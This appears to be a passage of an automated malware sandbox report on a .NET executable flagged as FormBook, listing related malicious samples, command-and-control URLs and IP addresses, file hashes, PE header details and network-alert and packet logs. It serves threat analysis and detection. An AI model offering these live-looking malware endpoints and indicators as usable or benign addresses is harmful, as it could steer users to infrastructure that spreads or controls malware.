                                                                                                              • www.noobblaster.com/qbru/?MFgP_=JwUQbw9gdYZct0LJE7cQmaqkr3NW5p4oJl17WXJ+AFRyfT4sHnCJTE/q+g/8FXC2UPAGWJVVrTRCX1TQonP+VR+Uhh19tyUYYPxwnQA=&x2=udVPKH
                                                                                                              RFQ.docGet hashmaliciousUnknownBrowse
                                                                                                              • www.noobblaster.com/qbru/?ynq=JwUQbw9gdYZct0LJE7cQmaqkr3NW5p4oJl17WXJ+AFRyfT4sHnCJTE/q+g/8FXC2UPAGWJVVrTRCX1TQonP+VR+Uhh19tyUYYPxwnQA=&Z2I=9LPl
                                                                                                              AWB_#191023.docGet hashmaliciousUnknownBrowse
                                                                                                              • www.noobblaster.com/qbru/?NdR8lz=JwUQbw9gdYZct0LJE7cQmaqkr3NW5p4oJl17WXJ+AFRyfT4sHnCJTE/q+g/8FXC2UPAGWJVVrTRCX1TQonP+VR+Uhh19tyUYYPxwnQA=&iBO=-XVx_p2X1d
                                                                                                              TotalXTunisiaXRFQ.docx.docGet hashmaliciousUnknownBrowse
                                                                                                              • www.noobblaster.com/qbru/?vhM=JwUQbw9gdYZct0LJE7cQmaqkr3NW5p4oJl17WXJ+AFRyfT4sHnCJTE/q+g/8FXC2UPAGWJVVrTRCX1TQonP+VR+Uhh19tyUYYPxwnQA=&xf=zVtXZTC0WR2XXd
                                                                                                              7c912KO5XC.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                              • www.zhperviepixie.com/sy22/?Dxoxs=hdFL0kw119WJTNhykMkXOvLbydzGG5NDjXDbBbflEf+ywlprp6w0OIUX+XUFdJQRTkt9&lnzt=UlYpkFa
                                                                                                              19.10.2023_Tarihli_#U0130#U015flem_Dekontu.exeGet hashmaliciousUnknownBrowse
                                                                                                              • www.nexgen-gaming.com/fgkz/?B6npQ=O8V8yF7x&LpdH=L1TZCS35bu0vOYHNzZCPIdU0sWDhLvNiLfum3bQ18rX1WKbURfbupmyOYdxIRu4IbjlY68Wfuxyw3QRU1unTAz21VWrMWPgd6w==
                                                                                                              18.10.2023_Tarihli_#U0130#U015flem_Dekontu.exeGet hashmaliciousUnknownBrowse
                                                                                                              • www.nexgen-gaming.com/fgkz/?m0v4zfJ=L1TZCS35bu0vOYHNzZCPIdU0sWDhLvNiLfum3bQ18rX1WKbURfbupmyOYdxIRu4IbjlY68Wfuxyw3QRU1unTWSSreFz3RroZ7g==&rFOH=HFl0
                                                                                                              PO#_34798450.xlsGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                              • www.zhperviepixie.com/sy22/?wBT4W2=GzuD&LR-4=hdFL0kw1ptSNTtp1mMkXOvLbydzGG5NDjXbLdYDkA/+zwUFtuqh4YMsV9y45Gpkicl4Nrw==
                                                                                                              SecuriteInfo.com.Win32.PWSX-gen.13397.19541.exeGet hashmaliciousUnknownBrowse
                                                                                                              • www.noobblaster.com/8hbu/?QRqdvJ=ONOt39nuwXTLYijxOhKkoURkOresMAdmzNibNY+7ziiCKPjY83ABD3J/YcUMMvBtNEW8rCVQNCq7JfxayIEvOcPAuExfajQRojAMGkPyPNDL&Mfxt=Xjktc0pP
                                                                                                              Advance_payment.docGet hashmaliciousFormBookBrowse
                                                                                                              • www.pacersun.com/4hc5/?MDK0Xf=YIoXQxIASBO+HkPGKjyMxPOX2glibAcKMSjczB161rT6EVSl/y3mC7wnA9amsA1Z+Z1rlQ==&pBW=Hr50U
                                                                                                              OwX3rXBIQT.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                              • www.molinoelvinculo.com/t6tg/?uZgh=TwH5KjSGroKvUUWoxYzXHYwPD1oBa+OlgcJKmgmA3lj472alkfYiVIja1wX5BJ9Ern3j&9rUD=GbPHmDXXvv
                                                                                                              Cari_Hesap_Ekstresi_100923.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                              • www.firstenergyconp.com/k13s/?El8lbnT=NPYhA1EkrjnWcxuD/cD9gJpXlbyf/3lXmEOriJ3YQjHnbmL4rCdqy7atBPOMdn4vtJMZ&Exlh-=UBZtmXO
                                                                                                              SecuriteInfo.com.Gen.Variant.Nemesis.1781.26240.30029.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                              • www.zhperviepixie.com/sy22/?LhBD=hdFL0kw119WJTNhykMkXOvLbydzGG5NDjXDbBbflEf+ywlprp6w0OIUX+XUFdJQRTkt9&WPg8=DheD
                                                                                                              SecuriteInfo.com.Win32.AdwareX-gen.18525.27375.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                              • www.zhperviepixie.com/sy22/?5j=hdFL0kwwpqSJT9l5kMkXOvLbydzGG5NDjXDbBbflEf+ywlprp6w0OIUX+XUvC5gRXml9&uVa4F=LHQT
                                                                                                              Dekont.pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                              • www.xpcslda.com/mh21/?EBZ=ZTLp_z4xh2a&YTfdpdO=C7miqzTEybANCzVKZPJwh2vXRECiGGtlnjv/1hfZr84fhwDaQOR6TLtNsfm/Z1g5WI5Sqs0GDw==
                                                                                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.22769.14377.rtfGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                              • www.batcavela.com/ge06/?YdOTPj=Q330NlraA7tYaKeRYSC7JMUzln/+sA0fy8mpHysJLBlsNI2WRIrp3xyNDPmP0TzmXGyyvQ==&Mrm8=jxod-tahmn98k
                                                                                                              SWIFT_4939459845845.xlsGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                              • www.zhperviepixie.com/sy22/?yVO4Zr3P=hdFL0kw1ptSNTtp1mMkXOvLbydzGG5NDjXbLdYDkA/+zwUFtuqh4YMsV9y45Gpkicl4Nrw==&ebF=6ldl7bM
                                                                                                              xzc3_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.polskiradio.com/g11y/?wh=pWgF+hDe5T1VQJEgc6/6b4BZ1fum8Q2gQQ0ZMaCvxv9gUMSKVKuPosMH/PVMVORc/IAd&F8=BZFhLR
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              parkingpage.namecheap.comPO_4501283529.xlsGet hashmaliciousFormBookBrowse
                                                                                                              • 91.195.240.19
                                                                                                              PO_4501289523.xlsGet hashmaliciousFormBookBrowse
                                                                                                              • 91.195.240.19
                                                                                                              TT_PAYMENT_SLIP_23AUG2023.docGet hashmaliciousFormBookBrowse
                                                                                                              • 91.195.240.19
                                                                                                              Bhl9bymdkI.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 91.195.240.19
                                                                                                              JPG-68376878978-SSG_TENDER_REQUEST.JPG.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 91.195.240.19
                                                                                                              SecuriteInfo.com.Win32.CrypterX-gen.18668.4514.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 91.195.240.19
                                                                                                              PDHuQXhoUB.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 91.195.240.19
                                                                                                              PDHuQXhoUB.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 91.195.240.19
                                                                                                              3RJv63AEc5.rtfGet hashmaliciousUnknownBrowse
                                                                                                              • 91.195.240.19
                                                                                                              Documentaci#U00f3n_Solicitada.PDF.exeGet hashmaliciousNSISDropperBrowse
                                                                                                              • 91.195.240.19
                                                                                                              RFQ.docGet hashmaliciousUnknownBrowse
                                                                                                              • 91.195.240.19
                                                                                                              AWB_#191023.docGet hashmaliciousUnknownBrowse
                                                                                                              • 91.195.240.19
                                                                                                              TotalXTunisiaXRFQ.docx.docGet hashmaliciousUnknownBrowse
                                                                                                              • 91.195.240.19
                                                                                                              PI_and_payment_confirmed_pdf.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                                                                              • 91.195.240.19
                                                                                                              PO-AM2307586.docGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                              • 91.195.240.19
                                                                                                              Audit_Confirmation_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 91.195.240.19
                                                                                                              Overdue_payment_settled.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 91.195.240.19
                                                                                                              SWIFT_LETTER_A1OzGLOB0NH2.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 91.195.240.19
                                                                                                              doc_Quanon_62_10-6_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 91.195.240.19
                                                                                                              Purchase_order.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 91.195.240.19
                                                                                                              www.7141999.comqSvGwvVvxr.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 154.86.64.96
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              ARGONDATANETWORK-AS-APArgonDataNetworkIDTT_PAYMENT_SLIP_23AUG2023.docGet hashmaliciousFormBookBrowse
                                                                                                              • 45.64.97.60
                                                                                                              3Fip115gvy.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 45.64.97.60
                                                                                                              BRq2dpdCAO.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 45.64.97.60
                                                                                                              ASN-QUADRANET-GLOBALUSproforma_Invoice.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                              • 104.223.35.34
                                                                                                              #U00f6deme_talimat#U0131.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 104.247.167.3
                                                                                                              https://www.vdtwv.site/loginGet hashmaliciousUnknownBrowse
                                                                                                              • 204.44.75.204
                                                                                                              https://www.ctahjvf.cn/loginGet hashmaliciousUnknownBrowse
                                                                                                              • 204.44.75.204
                                                                                                              6TZ8OukfGU.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 23.153.78.205
                                                                                                              ZpyyEEuSFW.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 69.12.93.108
                                                                                                              https://www.mzdjn.site/loginGet hashmaliciousUnknownBrowse
                                                                                                              • 204.44.75.204
                                                                                                              https://www.bkajriy.cn/loginGet hashmaliciousUnknownBrowse
                                                                                                              • 204.44.94.195
                                                                                                              1b2bfebd6093d8d95a03b4f732f89903ae6f828b292ab5765d0091b1.jsGet hashmaliciousUnknownBrowse
                                                                                                              • 185.174.101.224
                                                                                                              1b2bfebd6093d8d95a03b4f732f89903ae6f828b292ab5765d0091b1.jsGet hashmaliciousUnknownBrowse
                                                                                                              • 185.174.101.224
                                                                                                              TT_PAYMENT_SLIP_23AUG2023.docGet hashmaliciousFormBookBrowse
                                                                                                              • 154.205.127.201
                                                                                                              SHIPPING_DOCUMENTS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 64.188.2.244
                                                                                                              https://viewsnet.gafamulticonsultants.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 155.94.163.2
                                                                                                              https://jp.aeon.login.zxxw1tr.asia/Get hashmaliciousUnknownBrowse
                                                                                                              • 155.94.128.177
                                                                                                              https://www.rekuten-co.websitefly.com/rms/client/LO0101001.phpGet hashmaliciousUnknownBrowse
                                                                                                              • 192.161.56.6
                                                                                                              https://www.rekuten-co.villypharmacy.com/rms/client/LO0101001.phpGet hashmaliciousUnknownBrowse
                                                                                                              • 192.161.56.6
                                                                                                              https://viewsnet.helenstockings.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 155.94.163.2
                                                                                                              file.exeGet hashmaliciousGlupteba, LummaC Stealer, XmrigBrowse
                                                                                                              • 45.61.160.199
                                                                                                              3ff3e11128ead9eca87a33ac9bc9453cb8450212c0a00.exeGet hashmaliciousGlupteba, LummaC Stealer, XmrigBrowse
                                                                                                              • 45.61.160.199
                                                                                                              file.exeGet hashmaliciousGlupteba, LummaC Stealer, XmrigBrowse
                                                                                                              • 45.61.160.199
                                                                                                              POWERLINE-AS-APPOWERLINEDATACENTERHKscorp.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 45.202.220.122
                                                                                                              ZpyyEEuSFW.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 160.124.107.205
                                                                                                              PQY6fcmo1i.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 156.242.206.34
                                                                                                              Scan-00000090-4708948.IMG.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 45.115.127.35
                                                                                                              4xoQYcDD9b.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 154.216.83.104
                                                                                                              rYAJAFi7do.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 154.218.213.165
                                                                                                              BOQ-_AE200073490.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 160.124.8.40
                                                                                                              wuka9aK727.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 156.250.157.108
                                                                                                              http://4576cjdgaj786eugtdeuatda.z6.web.core.windows.netGet hashmaliciousUnknownBrowse
                                                                                                              • 154.201.164.184
                                                                                                              Order_List.docGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                              • 192.151.227.109
                                                                                                              qSvGwvVvxr.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 154.86.64.96
                                                                                                              skid.x86-20231016-0000.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 156.243.244.201
                                                                                                              skid.arm-20231016-0000.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 156.253.238.123
                                                                                                              vrfjUe0alF.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 156.242.206.17
                                                                                                              6lW2MrIQsG.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 156.251.7.183
                                                                                                              1HytjdgXc2.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 156.242.255.21
                                                                                                              x7RlIzQDk1.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 154.201.225.123
                                                                                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.9100.16087.rtfGet hashmaliciousFormBookBrowse
                                                                                                              • 154.215.96.241
                                                                                                              skid.arm-20231012-0350.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 156.244.244.94
                                                                                                              skid.x86-20231012-0350.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 156.244.244.93
                                                                                                              No context
                                                                                                              No context
                                                                                                              Process:C:\Users\user\Desktop\881SP1exr1.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1216
                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):7.906705476168155
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                              File name:881SP1exr1.exe
                                                                                                              File size:582'656 bytes
                                                                                                              MD5:fc8b3a3005cdc80ce19af33a57010fa8
                                                                                                              SHA1:b3303ebe7263a55a61e80407706711ca0727e496
                                                                                                              SHA256:66e461f8245be149d5a3826d29c170d5960ade477be127c0fe2bc315e26067a3
                                                                                                              SHA512:7486f49127aa27c5369361d34d754d95970e653266e4a507d6fa1874d9235d4aeda9f6424ad1dfa1e68c9e2d961a6ce5088ab38ed241c19ecb0ff457d3222ad0
                                                                                                              SSDEEP:12288:yG1tsT0hAbk1Y3qHBTsyyrHJLm3nI8UB6a2Si:D10YAoKgTTyr43
                                                                                                              TLSH:16C4120037F8A326E6FA1FF9D8B5A0514F39762A7875D24C1E9E50EF09A2F04C451B2B
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<.T...............0.............".... ........@.. .......................@............@................................
                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                              Entrypoint:0x48f822
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x8254FD3C [Sat Apr 16 23:05:32 2039 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8f7cf0x4f.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x900000x5d4.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x920000xc.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x8ce180x70.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x20000x8d8280x8da00False0.9327145851721095data7.915189773853943IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0x900000x5d40x600False0.4303385416666667data4.145745420950532IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0x920000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_VERSION0x900900x344data0.43301435406698563
                                                                                                              RT_MANIFEST0x903e40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                              DLLImport
                                                                                                              mscoree.dll_CorExeMain
                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                              192.168.2.4154.205.127.20149751802031412 10/26/23-09:49:19.774091TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.4154.205.127.201
                                                                                                              192.168.2.434.68.234.449753802031412 10/26/23-09:50:00.519357TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.434.68.234.4
                                                                                                              192.168.2.4154.86.64.9649754802031412 10/26/23-09:50:21.217300TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975480192.168.2.4154.86.64.96
                                                                                                              192.168.2.43.64.163.5049747802031412 10/26/23-09:47:37.390469TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.43.64.163.50
                                                                                                              192.168.2.4199.34.228.19149752802031412 10/26/23-09:49:39.892248TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.4199.34.228.191
                                                                                                              192.168.2.4167.172.228.2649755802031412 10/26/23-09:50:41.435579TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.4167.172.228.26
                                                                                                              192.168.2.491.195.240.1949743802031412 10/26/23-09:47:16.596276TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.491.195.240.19
                                                                                                              192.168.2.445.64.97.6049750802031412 10/26/23-09:48:59.501363TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.445.64.97.60
                                                                                                              192.168.2.413.32.208.7249749802031412 10/26/23-09:48:38.253900TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974980192.168.2.413.32.208.72
                                                                                                              192.168.2.4103.120.80.11149748802031412 10/26/23-09:47:58.535070TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.4103.120.80.111
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Oct 26, 2023 09:47:16.410836935 CEST4974380192.168.2.491.195.240.19
                                                                                                              Oct 26, 2023 09:47:16.595984936 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:16.596276045 CEST4974380192.168.2.491.195.240.19
                                                                                                              Oct 26, 2023 09:47:16.596276045 CEST4974380192.168.2.491.195.240.19
                                                                                                              Oct 26, 2023 09:47:16.820709944 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:16.850316048 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:16.850387096 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:16.850404978 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:16.850442886 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:16.850461960 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:16.850481987 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:16.850522041 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:16.850568056 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:16.850604057 CEST4974380192.168.2.491.195.240.19
                                                                                                              Oct 26, 2023 09:47:16.850605011 CEST4974380192.168.2.491.195.240.19
                                                                                                              Oct 26, 2023 09:47:16.850629091 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:16.850652933 CEST4974380192.168.2.491.195.240.19
                                                                                                              Oct 26, 2023 09:47:16.850755930 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:16.850811005 CEST4974380192.168.2.491.195.240.19
                                                                                                              Oct 26, 2023 09:47:17.034360886 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:17.034400940 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:17.034424067 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:17.034454107 CEST4974380192.168.2.491.195.240.19
                                                                                                              Oct 26, 2023 09:47:17.034507036 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:17.034544945 CEST4974380192.168.2.491.195.240.19
                                                                                                              Oct 26, 2023 09:47:17.034595966 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:17.034620047 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:17.034658909 CEST4974380192.168.2.491.195.240.19
                                                                                                              Oct 26, 2023 09:47:17.034663916 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:17.034744978 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:17.034785986 CEST4974380192.168.2.491.195.240.19
                                                                                                              Oct 26, 2023 09:47:17.034810066 CEST804974391.195.240.19192.168.2.4
                                                                                                              Oct 26, 2023 09:47:17.034892082 CEST4974380192.168.2.491.195.240.19
                                                                                                              Oct 26, 2023 09:47:17.034925938 CEST4974380192.168.2.491.195.240.19
